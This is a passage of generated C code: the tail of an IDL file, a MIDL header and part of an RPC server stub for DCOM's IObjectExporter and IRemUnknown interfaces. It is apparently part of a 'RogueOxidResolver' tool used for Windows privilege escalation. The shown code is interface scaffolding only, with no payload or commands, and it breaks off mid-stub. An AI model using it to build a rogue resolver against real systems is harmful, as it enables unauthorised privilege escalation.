MAX_REQUESTED_INTERFACES)] DWORD cIfs; 320 | [size_is(cIfs)] IID* piid; 321 | [size_is(cIfs)] HRESULT* phresults; 322 | [size_is(cIfs)] MInterfacePointer** ppIntfData; 323 | } PropsOutInfo; 324 | 325 | typedef struct tagSecurityInfoData 326 | { 327 | DWORD dwAuthnFlags; 328 | COSERVERINFO* pServerInfo; 329 | DWORD* pdwReserved; 330 | } SecurityInfoData; 331 | 332 | typedef struct tagScmRequestInfoData 333 | { 334 | DWORD* pdwReserved; 335 | customREMOTE_REQUEST_SCM_INFO* remoteRequest; 336 | } ScmRequestInfoData; 337 | 338 | typedef struct tagScmReplyInfoData 339 | { 340 | DWORD* pdwReserved; 341 | customREMOTE_REPLY_SCM_INFO* remoteReply; 342 | } ScmReplyInfoData; 343 | 344 | typedef struct tagInstanceInfoData 345 | { 346 | [string] wchar_t* fileName; 347 | DWORD mode; 348 | MInterfacePointer* ifdROT; 349 | MInterfacePointer* ifdStg; 350 | } InstanceInfoData; 351 | 352 | typedef enum 353 | { 354 | SPD_FLAG_USE_CONSOLE_SESSION = 0x00000001, 355 | SPD_FLAG_USE_DEFAULT_AUTHN_LVL = 0x00000002, 356 | } SPD_FLAGS; 357 | 358 | typedef struct tagSpecialPropertiesData 359 | { 360 | unsigned long dwSessionId; 361 | long fRemoteThisSessionId; 362 | long fClientImpersonating; 363 | long fPartitionIDPresent; 364 | DWORD dwDefaultAuthnLvl; 365 | GUID guidPartition; 366 | DWORD dwPRTFlags; 367 | DWORD dwOrigClsctx; 368 | DWORD dwFlags; 369 | DWORD Reserved1; 370 | unsigned __int64 Reserved2; 371 | DWORD Reserved3[5]; 372 | } SpecialPropertiesData; 373 | 374 | typedef struct tagSpecialPropertiesData_Alternate 375 | { 376 | unsigned long dwSessionId; 377 | long fRemoteThisSessionId; 378 | long fClientImpersonating; 379 | long fPartitionIDPresent; 380 | DWORD dwDefaultAuthnLvl; 381 | GUID guidPartition; 382 | DWORD dwPRTFlags; 383 | DWORD dwOrigClsctx; 384 | DWORD dwFlags; 385 | DWORD Reserved3[8]; 386 | } SpecialPropertiesData_Alternate; 387 | -------------------------------------------------------------------------------- /RogueOxidResolver_h.h: -------------------------------------------------------------------------------- 1 | 2 | 3 | /* this ALWAYS GENERATED file contains the definitions for the interfaces */ 4 | 5 | 6 | /* File created by MIDL compiler version 8.01.0622 */ 7 | /* at Tue Jan 19 04:14:07 2038 8 | */ 9 | /* Compiler settings for RogueOxidResolver.idl: 10 | Oicf, W1, Zp8, env=Win64 (32b run), target_arch=AMD64 8.01.0622 11 | protocol : all , ms_ext, c_ext, robust 12 | error checks: allocation ref bounds_check enum stub_data 13 | VC __declspec() decoration level: 14 | __declspec(uuid()), __declspec(selectany), __declspec(novtable) 15 | DECLSPEC_UUID(), MIDL_INTERFACE() 16 | */ 17 | /* @@MIDL_FILE_HEADING( ) */ 18 | 19 | 20 | 21 | /* verify that the version is high enough to compile this file*/ 22 | #ifndef __REQUIRED_RPCNDR_H_VERSION__ 23 | #define __REQUIRED_RPCNDR_H_VERSION__ 500 24 | #endif 25 | 26 | #include "rpc.h" 27 | #include "rpcndr.h" 28 | 29 | #ifndef __RPCNDR_H_VERSION__ 30 | #error this stub requires an updated version of 31 | #endif /* __RPCNDR_H_VERSION__ */ 32 | 33 | #ifndef COM_NO_WINDOWS_H 34 | #include "windows.h" 35 | #include "ole2.h" 36 | #endif /*COM_NO_WINDOWS_H*/ 37 | 38 | #ifndef __RogueOxidResolver_h_h__ 39 | #define __RogueOxidResolver_h_h__ 40 | 41 | #if defined(_MSC_VER) && (_MSC_VER >= 1020) 42 | #pragma once 43 | #endif 44 | 45 | /* Forward Declarations */ 46 | 47 | #ifndef __IRemUnknown_FWD_DEFINED__ 48 | #define __IRemUnknown_FWD_DEFINED__ 49 | typedef interface IRemUnknown IRemUnknown; 50 | 51 | #endif /* __IRemUnknown_FWD_DEFINED__ */ 52 | 53 | 54 | #ifndef __IRemUnknown2_FWD_DEFINED__ 55 | #define __IRemUnknown2_FWD_DEFINED__ 56 | typedef interface IRemUnknown2 IRemUnknown2; 57 | 58 | #endif /* __IRemUnknown2_FWD_DEFINED__ */ 59 | 60 | 61 | /* header files for imported files */ 62 | #include "oaidl.h" 63 | #include "ocidl.h" 64 | 65 | #ifdef __cplusplus 66 | extern "C"{ 67 | #endif 68 | 69 | 70 | /* interface __MIDL_itf_RogueOxidResolver_0000_0000 */ 71 | /* [local] */ 72 | 73 | typedef GUID CLSID; 74 | 75 | typedef GUID IID; 76 | 77 | typedef MIDL_uhyper ID; 78 | 79 | typedef MIDL_uhyper OXID; 80 | 81 | typedef MIDL_uhyper OID; 82 | 83 | typedef MIDL_uhyper SETID; 84 | 85 | typedef GUID IPID; 86 | 87 | typedef GUID CID; 88 | 89 | typedef const GUID *REFIPID; 90 | 91 | #define MAX_REQUESTED_INTERFACES ( 0x8000 ) 92 | 93 | #define MAX_REQUESTED_PROTSEQS ( 0x8000 ) 94 | 95 | typedef struct tagCOMVERSION 96 | { 97 | unsigned short MajorVersion; 98 | unsigned short MinorVersion; 99 | } COMVERSION; 100 | 101 | typedef struct tagORPC_EXTENT 102 | { 103 | GUID id; 104 | unsigned long size; 105 | /* [size_is] */ byte data[ 1 ]; 106 | } ORPC_EXTENT; 107 | 108 | typedef struct tagORPC_EXTENT_ARRAY 109 | { 110 | unsigned long size; 111 | unsigned long reserved; 112 | /* [unique][size_is][size_is] */ ORPC_EXTENT **extent; 113 | } ORPC_EXTENT_ARRAY; 114 | 115 | typedef struct tagORPCTHIS 116 | { 117 | COMVERSION version; 118 | unsigned long flags; 119 | unsigned long reserved1; 120 | CID cid; 121 | /* [unique] */ ORPC_EXTENT_ARRAY *extensions; 122 | } ORPCTHIS; 123 | 124 | typedef struct tagORPCTHAT 125 | { 126 | unsigned long flags; 127 | /* [unique] */ ORPC_EXTENT_ARRAY *extensions; 128 | } ORPCTHAT; 129 | 130 | typedef struct tagDUALSTRINGARRAY 131 | { 132 | unsigned short wNumEntries; 133 | unsigned short wSecurityOffset; 134 | /* [size_is] */ unsigned short aStringArray[ 1 ]; 135 | } DUALSTRINGARRAY; 136 | 137 | 138 | enum tagCPFLAGS 139 | { 140 | CPFLAG_PROPAGATE = 0x1, 141 | CPFLAG_EXPOSE = 0x2, 142 | CPFLAG_ENVOY = 0x4 143 | } ; 144 | typedef struct tagMInterfacePointer 145 | { 146 | unsigned long ulCntData; 147 | /* [size_is] */ byte abData[ 1 ]; 148 | } MInterfacePointer; 149 | 150 | typedef /* [unique] */ MInterfacePointer *PMInterfacePointer; 151 | 152 | typedef struct tagErrorObjectData 153 | { 154 | DWORD dwVersion; 155 | DWORD dwHelpContext; 156 | IID iid; 157 | /* [string][unique] */ wchar_t *pszSource; 158 | /* [string][unique] */ wchar_t *pszDescription; 159 | /* [string][unique] */ wchar_t *pszHelpFile; 160 | } ErrorObjectData; 161 | 162 | 163 | 164 | extern RPC_IF_HANDLE __MIDL_itf_RogueOxidResolver_0000_0000_v0_0_c_ifspec; 165 | extern RPC_IF_HANDLE __MIDL_itf_RogueOxidResolver_0000_0000_v0_0_s_ifspec; 166 | 167 | #ifndef __IObjectExporter_INTERFACE_DEFINED__ 168 | #define __IObjectExporter_INTERFACE_DEFINED__ 169 | 170 | /* interface IObjectExporter */ 171 | /* [unique][uuid] */ 172 | 173 | /* [idempotent] */ error_status_t ResolveOxid( 174 | /* [in] */ handle_t hRpc, 175 | /* [in] */ OXID *pOxid, 176 | /* [in] */ unsigned short cRequestedProtseqs, 177 | /* [size_is][ref][in] */ unsigned short arRequestedProtseqs[ ], 178 | /* [ref][out] */ DUALSTRINGARRAY **ppdsaOxidBindings, 179 | /* [ref][out] */ IPID *pipidRemUnknown, 180 | /* [ref][out] */ DWORD *pAuthnHint); 181 | 182 | /* [idempotent] */ error_status_t SimplePing( 183 | /* [in] */ handle_t hRpc, 184 | /* [in] */ SETID *pSetId); 185 | 186 | /* [idempotent] */ error_status_t ComplexPing( 187 | /* [in] */ handle_t hRpc, 188 | /* [out][in] */ SETID *pSetId, 189 | /* [in] */ unsigned short SequenceNum, 190 | /* [in] */ unsigned short cAddToSet, 191 | /* [in] */ unsigned short cDelFromSet, 192 | /* [size_is][unique][in] */ OID AddToSet[ ], 193 | /* [size_is][unique][in] */ OID DelFromSet[ ], 194 | /* [out] */ unsigned short *pPingBackoffFactor); 195 | 196 | /* [idempotent] */ error_status_t ServerAlive( 197 | /* [in] */ handle_t hRpc); 198 | 199 | /* [idempotent] */ error_status_t ResolveOxid2( 200 | /* [in] */ handle_t hRpc, 201 | /* [in] */ OXID *pOxid, 202 | /* [in] */ unsigned short cRequestedProtseqs, 203 | /* [size_is][ref][in] */ unsigned short arRequestedProtseqs[ ], 204 | /* [ref][out] */ DUALSTRINGARRAY **ppdsaOxidBindings, 205 | /* [ref][out] */ IPID *pipidRemUnknown, 206 | /* [ref][out] */ DWORD *pAuthnHint, 207 | /* [ref][out] */ COMVERSION *pComVersion); 208 | 209 | /* [idempotent] */ error_status_t ServerAlive2( 210 | /* [in] */ handle_t hRpc, 211 | /* [ref][out] */ COMVERSION *pComVersion, 212 | /* [ref][out] */ DUALSTRINGARRAY **ppdsaOrBindings, 213 | /* [ref][out] */ DWORD *pReserved); 214 | 215 | 216 | 217 | extern RPC_IF_HANDLE IObjectExporter_v0_0_c_ifspec; 218 | extern RPC_IF_HANDLE IObjectExporter_v0_0_s_ifspec; 219 | #endif /* __IObjectExporter_INTERFACE_DEFINED__ */ 220 | 221 | /* interface __MIDL_itf_RogueOxidResolver_0000_0001 */ 222 | /* [local] */ 223 | 224 | typedef struct tagSTDOBJREF 225 | { 226 | unsigned long flags; 227 | unsigned long cPublicRefs; 228 | OXID oxid; 229 | OID oid; 230 | IPID ipid; 231 | } STDOBJREF; 232 | 233 | typedef struct tagREMQIRESULT 234 | { 235 | HRESULT hResult; 236 | STDOBJREF std; 237 | } REMQIRESULT; 238 | 239 | typedef struct tagREMINTERFACEREF 240 | { 241 | IPID ipid; 242 | unsigned long cPublicRefs; 243 | unsigned long cPrivateRefs; 244 | } REMINTERFACEREF; 245 | 246 | typedef /* [disable_consistency_check] */ REMQIRESULT *PREMQIRESULT; 247 | 248 | typedef /* [disable_consistency_check] */ MInterfacePointer *PMInterfacePointerInternal; 249 | 250 | 251 | 252 | extern RPC_IF_HANDLE __MIDL_itf_RogueOxidResolver_0000_0001_v0_0_c_ifspec; 253 | extern RPC_IF_HANDLE __MIDL_itf_RogueOxidResolver_0000_0001_v0_0_s_ifspec; 254 | 255 | #ifndef __IRemUnknown_INTERFACE_DEFINED__ 256 | #define __IRemUnknown_INTERFACE_DEFINED__ 257 | 258 | /* interface IRemUnknown */ 259 | /* [uuid][object] */ 260 | 261 | 262 | EXTERN_C const IID IID_IRemUnknown; 263 | 264 | #if defined(__cplusplus) && !defined(CINTERFACE) 265 | 266 | MIDL_INTERFACE("00000131-0000-0000-C000-000000000046") 267 | IRemUnknown : public IUnknown 268 | { 269 | public: 270 | virtual HRESULT STDMETHODCALLTYPE RemQueryInterface( 271 | /* [in] */ REFIPID ripid, 272 | /* [in] */ unsigned long cRefs, 273 | /* [in] */ unsigned short cIids, 274 | /* [size_is][in] */ IID *iids, 275 | /* [size_is][size_is][out] */ PREMQIRESULT *ppQIResults) = 0; 276 | 277 | virtual HRESULT STDMETHODCALLTYPE RemAddRef( 278 | /* [in] */ unsigned short cInterfaceRefs, 279 | /* [size_is][in] */ REMINTERFACEREF InterfaceRefs[ ], 280 | /* [size_is][out] */ HRESULT *pResults) = 0; 281 | 282 | virtual HRESULT STDMETHODCALLTYPE RemRelease( 283 | /* [in] */ unsigned short cInterfaceRefs, 284 | /* [size_is][in] */ REMINTERFACEREF InterfaceRefs[ ]) = 0; 285 | 286 | }; 287 | 288 | 289 | #else /* C style interface */ 290 | 291 | typedef struct IRemUnknownVtbl 292 | { 293 | BEGIN_INTERFACE 294 | 295 | HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 296 | IRemUnknown * This, 297 | /* [in] */ REFIID riid, 298 | /* [annotation][iid_is][out] */ 299 | _COM_Outptr_ void **ppvObject); 300 | 301 | ULONG ( STDMETHODCALLTYPE *AddRef )( 302 | IRemUnknown * This); 303 | 304 | ULONG ( STDMETHODCALLTYPE *Release )( 305 | IRemUnknown * This); 306 | 307 | HRESULT ( STDMETHODCALLTYPE *RemQueryInterface )( 308 | IRemUnknown * This, 309 | /* [in] */ REFIPID ripid, 310 | /* [in] */ unsigned long cRefs, 311 | /* [in] */ unsigned short cIids, 312 | /* [size_is][in] */ IID *iids, 313 | /* [size_is][size_is][out] */ PREMQIRESULT *ppQIResults); 314 | 315 | HRESULT ( STDMETHODCALLTYPE *RemAddRef )( 316 | IRemUnknown * This, 317 | /* [in] */ unsigned short cInterfaceRefs, 318 | /* [size_is][in] */ REMINTERFACEREF InterfaceRefs[ ], 319 | /* [size_is][out] */ HRESULT *pResults); 320 | 321 | HRESULT ( STDMETHODCALLTYPE *RemRelease )( 322 | IRemUnknown * This, 323 | /* [in] */ unsigned short cInterfaceRefs, 324 | /* [size_is][in] */ REMINTERFACEREF InterfaceRefs[ ]); 325 | 326 | END_INTERFACE 327 | } IRemUnknownVtbl; 328 | 329 | interface IRemUnknown 330 | { 331 | CONST_VTBL struct IRemUnknownVtbl *lpVtbl; 332 | }; 333 | 334 | 335 | 336 | #ifdef COBJMACROS 337 | 338 | 339 | #define IRemUnknown_QueryInterface(This,riid,ppvObject) \ 340 | ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 341 | 342 | #define IRemUnknown_AddRef(This) \ 343 | ( (This)->lpVtbl -> AddRef(This) ) 344 | 345 | #define IRemUnknown_Release(This) \ 346 | ( (This)->lpVtbl -> Release(This) ) 347 | 348 | 349 | #define IRemUnknown_RemQueryInterface(This,ripid,cRefs,cIids,iids,ppQIResults) \ 350 | ( (This)->lpVtbl -> RemQueryInterface(This,ripid,cRefs,cIids,iids,ppQIResults) ) 351 | 352 | #define IRemUnknown_RemAddRef(This,cInterfaceRefs,InterfaceRefs,pResults) \ 353 | ( (This)->lpVtbl -> RemAddRef(This,cInterfaceRefs,InterfaceRefs,pResults) ) 354 | 355 | #define IRemUnknown_RemRelease(This,cInterfaceRefs,InterfaceRefs) \ 356 | ( (This)->lpVtbl -> RemRelease(This,cInterfaceRefs,InterfaceRefs) ) 357 | 358 | #endif /* COBJMACROS */ 359 | 360 | 361 | #endif /* C style interface */ 362 | 363 | 364 | 365 | 366 | #endif /* __IRemUnknown_INTERFACE_DEFINED__ */ 367 | 368 | 369 | #ifndef __IRemUnknown2_INTERFACE_DEFINED__ 370 | #define __IRemUnknown2_INTERFACE_DEFINED__ 371 | 372 | /* interface IRemUnknown2 */ 373 | /* [uuid][object] */ 374 | 375 | 376 | EXTERN_C const IID IID_IRemUnknown2; 377 | 378 | #if defined(__cplusplus) && !defined(CINTERFACE) 379 | 380 | MIDL_INTERFACE("00000143-0000-0000-C000-000000000046") 381 | IRemUnknown2 : public IRemUnknown 382 | { 383 | public: 384 | virtual HRESULT STDMETHODCALLTYPE RemQueryInterface2( 385 | /* [in] */ REFIPID ripid, 386 | /* [in] */ unsigned short cIids, 387 | /* [size_is][in] */ IID *iids, 388 | /* [size_is][out] */ HRESULT *phr, 389 | /* [size_is][out] */ PMInterfacePointerInternal *ppMIF) = 0; 390 | 391 | }; 392 | 393 | 394 | #else /* C style interface */ 395 | 396 | typedef struct IRemUnknown2Vtbl 397 | { 398 | BEGIN_INTERFACE 399 | 400 | HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 401 | IRemUnknown2 * This, 402 | /* [in] */ REFIID riid, 403 | /* [annotation][iid_is][out] */ 404 | _COM_Outptr_ void **ppvObject); 405 | 406 | ULONG ( STDMETHODCALLTYPE *AddRef )( 407 | IRemUnknown2 * This); 408 | 409 | ULONG ( STDMETHODCALLTYPE *Release )( 410 | IRemUnknown2 * This); 411 | 412 | HRESULT ( STDMETHODCALLTYPE *RemQueryInterface )( 413 | IRemUnknown2 * This, 414 | /* [in] */ REFIPID ripid, 415 | /* [in] */ unsigned long cRefs, 416 | /* [in] */ unsigned short cIids, 417 | /* [size_is][in] */ IID *iids, 418 | /* [size_is][size_is][out] */ PREMQIRESULT *ppQIResults); 419 | 420 | HRESULT ( STDMETHODCALLTYPE *RemAddRef )( 421 | IRemUnknown2 * This, 422 | /* [in] */ unsigned short cInterfaceRefs, 423 | /* [size_is][in] */ REMINTERFACEREF InterfaceRefs[ ], 424 | /* [size_is][out] */ HRESULT *pResults); 425 | 426 | HRESULT ( STDMETHODCALLTYPE *RemRelease )( 427 | IRemUnknown2 * This, 428 | /* [in] */ unsigned short cInterfaceRefs, 429 | /* [size_is][in] */ REMINTERFACEREF InterfaceRefs[ ]); 430 | 431 | HRESULT ( STDMETHODCALLTYPE *RemQueryInterface2 )( 432 | IRemUnknown2 * This, 433 | /* [in] */ REFIPID ripid, 434 | /* [in] */ unsigned short cIids, 435 | /* [size_is][in] */ IID *iids, 436 | /* [size_is][out] */ HRESULT *phr, 437 | /* [size_is][out] */ PMInterfacePointerInternal *ppMIF); 438 | 439 | END_INTERFACE 440 | } IRemUnknown2Vtbl; 441 | 442 | interface IRemUnknown2 443 | { 444 | CONST_VTBL struct IRemUnknown2Vtbl *lpVtbl; 445 | }; 446 | 447 | 448 | 449 | #ifdef COBJMACROS 450 | 451 | 452 | #define IRemUnknown2_QueryInterface(This,riid,ppvObject) \ 453 | ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 454 | 455 | #define IRemUnknown2_AddRef(This) \ 456 | ( (This)->lpVtbl -> AddRef(This) ) 457 | 458 | #define IRemUnknown2_Release(This) \ 459 | ( (This)->lpVtbl -> Release(This) ) 460 | 461 | 462 | #define IRemUnknown2_RemQueryInterface(This,ripid,cRefs,cIids,iids,ppQIResults) \ 463 | ( (This)->lpVtbl -> RemQueryInterface(This,ripid,cRefs,cIids,iids,ppQIResults) ) 464 | 465 | #define IRemUnknown2_RemAddRef(This,cInterfaceRefs,InterfaceRefs,pResults) \ 466 | ( (This)->lpVtbl -> RemAddRef(This,cInterfaceRefs,InterfaceRefs,pResults) ) 467 | 468 | #define IRemUnknown2_RemRelease(This,cInterfaceRefs,InterfaceRefs) \ 469 | ( (This)->lpVtbl -> RemRelease(This,cInterfaceRefs,InterfaceRefs) ) 470 | 471 | 472 | #define IRemUnknown2_RemQueryInterface2(This,ripid,cIids,iids,phr,ppMIF) \ 473 | ( (This)->lpVtbl -> RemQueryInterface2(This,ripid,cIids,iids,phr,ppMIF) ) 474 | 475 | #endif /* COBJMACROS */ 476 | 477 | 478 | #endif /* C style interface */ 479 | 480 | 481 | 482 | 483 | #endif /* __IRemUnknown2_INTERFACE_DEFINED__ */ 484 | 485 | 486 | /* interface __MIDL_itf_RogueOxidResolver_0000_0003 */ 487 | /* [local] */ 488 | 489 | #define MIN_ACTPROP_LIMIT ( 1 ) 490 | 491 | #define MAX_ACTPROP_LIMIT ( 10 ) 492 | 493 | typedef struct _customREMOTE_REQUEST_SCM_INFO 494 | { 495 | DWORD ClientImpLevel; 496 | /* [range] */ unsigned short cRequestedProtseqs; 497 | /* [size_is] */ unsigned short *pRequestedProtseqs; 498 | } customREMOTE_REQUEST_SCM_INFO; 499 | 500 | typedef struct _customREMOTE_REPLY_SCM_INFO 501 | { 502 | OXID Oxid; 503 | DUALSTRINGARRAY *pdsaOxidBindings; 504 | IPID ipidRemUnknown; 505 | DWORD authnHint; 506 | COMVERSION serverVersion; 507 | } customREMOTE_REPLY_SCM_INFO; 508 | 509 | typedef struct tagInstantiationInfoData 510 | { 511 | CLSID classId; 512 | DWORD classCtx; 513 | DWORD actvflags; 514 | long fIsSurrogate; 515 | /* [range] */ DWORD cIID; 516 | DWORD instFlag; 517 | /* [size_is] */ IID *pIID; 518 | DWORD thisSize; 519 | COMVERSION clientCOMVersion; 520 | } InstantiationInfoData; 521 | 522 | typedef struct tagLocationInfoData 523 | { 524 | /* [string] */ wchar_t *machineName; 525 | DWORD processId; 526 | DWORD apartmentId; 527 | DWORD contextId; 528 | } LocationInfoData; 529 | 530 | typedef struct tagActivationContextInfoData 531 | { 532 | long clientOK; 533 | long bReserved1; 534 | DWORD dwReserved1; 535 | DWORD dwReserved2; 536 | MInterfacePointer *pIFDClientCtx; 537 | MInterfacePointer *pIFDPrototypeCtx; 538 | } ActivationContextInfoData; 539 | 540 | typedef struct tagCustomHeader 541 | { 542 | DWORD totalSize; 543 | DWORD headerSize; 544 | DWORD dwReserved; 545 | DWORD destCtx; 546 | /* [range] */ DWORD cIfs; 547 | CLSID classInfoClsid; 548 | /* [size_is] */ CLSID *pclsid; 549 | /* [size_is] */ DWORD *pSizes; 550 | DWORD *pdwReserved; 551 | } CustomHeader; 552 | 553 | typedef struct tagPropsOutInfo 554 | { 555 | /* [range] */ DWORD cIfs; 556 | /* [size_is] */ IID *piid; 557 | /* [size_is] */ HRESULT *phresults; 558 | /* [size_is] */ MInterfacePointer **ppIntfData; 559 | } PropsOutInfo; 560 | 561 | typedef struct tagSecurityInfoData 562 | { 563 | DWORD dwAuthnFlags; 564 | COSERVERINFO *pServerInfo; 565 | DWORD *pdwReserved; 566 | } SecurityInfoData; 567 | 568 | typedef struct tagScmRequestInfoData 569 | { 570 | DWORD *pdwReserved; 571 | customREMOTE_REQUEST_SCM_INFO *remoteRequest; 572 | } ScmRequestInfoData; 573 | 574 | typedef struct tagScmReplyInfoData 575 | { 576 | DWORD *pdwReserved; 577 | customREMOTE_REPLY_SCM_INFO *remoteReply; 578 | } ScmReplyInfoData; 579 | 580 | typedef struct tagInstanceInfoData 581 | { 582 | /* [string] */ wchar_t *fileName; 583 | DWORD mode; 584 | MInterfacePointer *ifdROT; 585 | MInterfacePointer *ifdStg; 586 | } InstanceInfoData; 587 | 588 | typedef /* [public] */ 589 | enum __MIDL___MIDL_itf_RogueOxidResolver_0000_0003_0001 590 | { 591 | SPD_FLAG_USE_CONSOLE_SESSION = 0x1, 592 | SPD_FLAG_USE_DEFAULT_AUTHN_LVL = 0x2 593 | } SPD_FLAGS; 594 | 595 | typedef struct tagSpecialPropertiesData 596 | { 597 | unsigned long dwSessionId; 598 | long fRemoteThisSessionId; 599 | long fClientImpersonating; 600 | long fPartitionIDPresent; 601 | DWORD dwDefaultAuthnLvl; 602 | GUID guidPartition; 603 | DWORD dwPRTFlags; 604 | DWORD dwOrigClsctx; 605 | DWORD dwFlags; 606 | DWORD Reserved1; 607 | unsigned __int64 Reserved2; 608 | DWORD Reserved3[ 5 ]; 609 | } SpecialPropertiesData; 610 | 611 | typedef struct tagSpecialPropertiesData_Alternate 612 | { 613 | unsigned long dwSessionId; 614 | long fRemoteThisSessionId; 615 | long fClientImpersonating; 616 | long fPartitionIDPresent; 617 | DWORD dwDefaultAuthnLvl; 618 | GUID guidPartition; 619 | DWORD dwPRTFlags; 620 | DWORD dwOrigClsctx; 621 | DWORD dwFlags; 622 | DWORD Reserved3[ 8 ]; 623 | } SpecialPropertiesData_Alternate; 624 | 625 | 626 | 627 | extern RPC_IF_HANDLE __MIDL_itf_RogueOxidResolver_0000_0003_v0_0_c_ifspec; 628 | extern RPC_IF_HANDLE __MIDL_itf_RogueOxidResolver_0000_0003_v0_0_s_ifspec; 629 | 630 | /* Additional Prototypes for ALL interfaces */ 631 | 632 | /* end of Additional Prototypes */ 633 | 634 | #ifdef __cplusplus 635 | } 636 | #endif 637 | 638 | #endif 639 | 640 | 641 | -------------------------------------------------------------------------------- /RogueOxidResolver_s.c: -------------------------------------------------------------------------------- 1 | 2 | 3 | /* this ALWAYS GENERATED file contains the RPC server stubs */ 4 | 5 | 6 | /* File created by MIDL compiler version 8.01.0622 */ 7 | /* at Tue Jan 19 04:14:07 2038 8 | */ 9 | /* Compiler settings for RogueOxidResolver.idl: 10 | Oicf, W1, Zp8, env=Win64 (32b run), target_arch=AMD64 8.01.0622 11 | protocol : all , ms_ext, c_ext, robust 12 | error checks: allocation ref bounds_check enum stub_data 13 | VC __declspec() decoration level: 14 | __declspec(uuid()), __declspec(selectany), __declspec(novtable) 15 | DECLSPEC_UUID(), MIDL_INTERFACE() 16 | */ 17 | /* @@MIDL_FILE_HEADING( ) */ 18 | 19 | #if defined(_M_AMD64) 20 | 21 | 22 | #if _MSC_VER >= 1200 23 | #pragma warning(push) 24 | #endif 25 | 26 | #pragma warning( disable: 4211 ) /* redefine extern to static */ 27 | #pragma warning( disable: 4232 ) /* dllimport identity*/ 28 | #pragma warning( disable: 4024 ) /* array to pointer mapping*/ 29 | 30 | #include 31 | #include "RogueOxidResolver_h.h" 32 | 33 | #define TYPE_FORMAT_STRING_SIZE 123 34 | #define PROC_FORMAT_STRING_SIZE 361 35 | #define EXPR_FORMAT_STRING_SIZE 1 36 | #define TRANSMIT_AS_TABLE_SIZE 0 37 | #define WIRE_MARSHAL_TABLE_SIZE 0 38 | 39 | typedef struct _RogueOxidResolver_MIDL_TYPE_FORMAT_STRING 40 | { 41 | short Pad; 42 | unsigned char Format[ TYPE_FORMAT_STRING_SIZE ]; 43 | } RogueOxidResolver_MIDL_TYPE_FORMAT_STRING; 44 | 45 | typedef struct _RogueOxidResolver_MIDL_PROC_FORMAT_STRING 46 | { 47 | short Pad; 48 | unsigned char Format[ PROC_FORMAT_STRING_SIZE ]; 49 | } RogueOxidResolver_MIDL_PROC_FORMAT_STRING; 50 | 51 | typedef struct _RogueOxidResolver_MIDL_EXPR_FORMAT_STRING 52 | { 53 | long Pad; 54 | unsigned char Format[ EXPR_FORMAT_STRING_SIZE ]; 55 | } RogueOxidResolver_MIDL_EXPR_FORMAT_STRING; 56 | 57 | 58 | static const RPC_SYNTAX_IDENTIFIER _RpcTransferSyntax = 59 | {{0x8A885D04,0x1CEB,0x11C9,{0x9F,0xE8,0x08,0x00,0x2B,0x10,0x48,0x60}},{2,0}}; 60 | 61 | static const RPC_SYNTAX_IDENTIFIER _NDR64_RpcTransferSyntax = 62 | {{0x71710533,0xbeba,0x4937,{0x83,0x19,0xb5,0xdb,0xef,0x9c,0xcc,0x36}},{1,0}}; 63 | 64 | 65 | extern const RogueOxidResolver_MIDL_TYPE_FORMAT_STRING RogueOxidResolver__MIDL_TypeFormatString; 66 | extern const RogueOxidResolver_MIDL_PROC_FORMAT_STRING RogueOxidResolver__MIDL_ProcFormatString; 67 | extern const RogueOxidResolver_MIDL_EXPR_FORMAT_STRING RogueOxidResolver__MIDL_ExprFormatString; 68 | 69 | /* Standard interface: __MIDL_itf_RogueOxidResolver_0000_0000, ver. 0.0, 70 | GUID={0x00000000,0x0000,0x0000,{0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00}} */ 71 | 72 | 73 | /* Standard interface: IObjectExporter, ver. 0.0, 74 | GUID={0x99fcfec4,0x5260,0x101b,{0xbb,0xcb,0x00,0xaa,0x00,0x21,0x34,0x7a}} */ 75 | 76 | 77 | extern const MIDL_SERVER_INFO IObjectExporter_ServerInfo; 78 | 79 | extern const RPC_DISPATCH_TABLE IObjectExporter_v0_0_DispatchTable; 80 | 81 | static const RPC_SERVER_INTERFACE IObjectExporter___RpcServerInterface = 82 | { 83 | sizeof(RPC_SERVER_INTERFACE), 84 | {{0x99fcfec4,0x5260,0x101b,{0xbb,0xcb,0x00,0xaa,0x00,0x21,0x34,0x7a}},{0,0}}, 85 | {{0x8A885D04,0x1CEB,0x11C9,{0x9F,0xE8,0x08,0x00,0x2B,0x10,0x48,0x60}},{2,0}}, 86 | (RPC_DISPATCH_TABLE*)&IObjectExporter_v0_0_DispatchTable, 87 | 0, 88 | 0, 89 | 0, 90 | &IObjectExporter_ServerInfo, 91 | 0x06000000 92 | }; 93 | RPC_IF_HANDLE IObjectExporter_v0_0_s_ifspec = (RPC_IF_HANDLE)& IObjectExporter___RpcServerInterface; 94 | 95 | extern const MIDL_STUB_DESC IObjectExporter_StubDesc; 96 | 97 | 98 | /* Standard interface: __MIDL_itf_RogueOxidResolver_0000_0001, ver. 0.0, 99 | GUID={0x00000000,0x0000,0x0000,{0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00}} */ 100 | 101 | 102 | /* Standard interface: __MIDL_itf_RogueOxidResolver_0000_0003, ver. 0.0, 103 | GUID={0x00000000,0x0000,0x0000,{0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00}} */ 104 | 105 | 106 | #if !defined(__RPC_WIN64__) 107 | #error Invalid build platform for this stub. 108 | #endif 109 | 110 | static const RogueOxidResolver_MIDL_PROC_FORMAT_STRING RogueOxidResolver__MIDL_ProcFormatString = 111 | { 112 | 0, 113 | { 114 | 115 | /* Procedure ResolveOxid */ 116 | 117 | 0x0, /* 0 */ 118 | 0x48, /* Old Flags: */ 119 | /* 2 */ NdrFcLong( 0x1 ), /* 1 */ 120 | /* 6 */ NdrFcShort( 0x0 ), /* 0 */ 121 | /* 8 */ NdrFcShort( 0x40 ), /* X64 Stack size/offset = 64 */ 122 | /* 10 */ 0x32, /* FC_BIND_PRIMITIVE */ 123 | 0x0, /* 0 */ 124 | /* 12 */ NdrFcShort( 0x0 ), /* X64 Stack size/offset = 0 */ 125 | /* 14 */ NdrFcShort( 0x2a ), /* 42 */ 126 | /* 16 */ NdrFcShort( 0x68 ), /* 104 */ 127 | /* 18 */ 0x47, /* Oi2 Flags: srv must size, clt must size, has return, has ext, */ 128 | 0x7, /* 7 */ 129 | /* 20 */ 0xa, /* 10 */ 130 | 0x7, /* Ext Flags: new corr desc, clt corr check, srv corr check, */ 131 | /* 22 */ NdrFcShort( 0x1 ), /* 1 */ 132 | /* 24 */ NdrFcShort( 0x1 ), /* 1 */ 133 